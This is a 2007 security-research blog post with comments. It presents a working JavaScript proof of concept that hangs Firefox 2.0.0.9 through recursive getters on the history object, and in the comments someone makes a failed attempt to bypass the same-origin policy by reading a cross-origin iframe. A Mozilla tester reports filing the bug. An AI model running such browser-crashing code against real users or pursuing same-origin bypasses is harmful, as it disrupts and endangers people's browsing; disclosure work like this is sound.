Firefox history DOS attack
Wednesday, 14 November 2007
Here’s a complete DOS attack on Firefox using the history object:-
window.onload = function() {
history.__defineGetter__("x", function() {
for(i in this) {
try {
alert(this[i]);
} catch(e) {
}
}
});
history.x;
}
Tested on Firefox 2.0.0.9 mac, a window pops up with two blank buttons and you are unable to do anything without using force quit.
No. 1 — November 14th, 2007 at 9:43 pm
Nice work, Gareth. I’m really pulling that you figure out a way to break the same origin policy simply because it would be quite impressive.
No. 2 — November 14th, 2007 at 9:48 pm
Thanks 🙂 yeah that’s my plan, I’m not sure it’s possible because the objects are spoofed getters. I’m having fun trying though
No. 3 — November 15th, 2007 at 10:14 am
Yep – the holy grail of SOP. I’ve been trying various approaches recently but haven’t had any success yet.
My last attempt was to fill iframes with HTML via this.innerHTML=’payload’ in the src attribute and trying to access the rendered content after a timeout. But Firefox manages to handle it too – any property inside contentWindow is access restricted.
No. 4 — November 15th, 2007 at 11:46 am
Here’s my new attempt:-
window.onload = function() {
newElement = document.createElement(‘iframe’);
newElement.src = ‘http://www.google.co.uk/’;
newElement.id = ‘iframe’;
newElement.onload = function() {
var doc = this.contentWindow.document;
this.__defineGetter__(‘contentWindow’,function() { return doc });
x = this.contentWindow;
delete this.contentWindow;
delete doc;
alert(x);
}
document.body.appendChild(newElement);
}
Doesn’t work though 🙁
No. 5 — November 15th, 2007 at 11:47 am
Accessing body or innerHTML causes a permission error.
No. 6 — November 16th, 2007 at 7:58 am
Thanks for discovering and reporting this clever way to confuse Firefox with recursion. I’ve filed https://bugzilla.mozilla.org/show_bug.cgi?id=403999 with a clearer testcase — you can use any object, even ({}), in place of the history object.
No. 7 — November 16th, 2007 at 9:13 am
Hey Jesse
No problem! Yeah I figured it would work on any object but the history one was the one I was testing at the time.
No. 8 — November 17th, 2007 at 6:08 pm
Does anyone have a study hint in order to fully appreciate the technical implications?
No. 9 — November 18th, 2007 at 7:31 am
Jophn, I’d start by reading old bugs in bugzilla.mozilla.org about JavaScript recursion limits, and then using those bug reports to find the relevant source code. Once you understand how they work, you might have enough information to fix the bug, or you might not — it might require knowledge of XBL or something. I don’t know, I’m more a tester than a Gecko developer 😉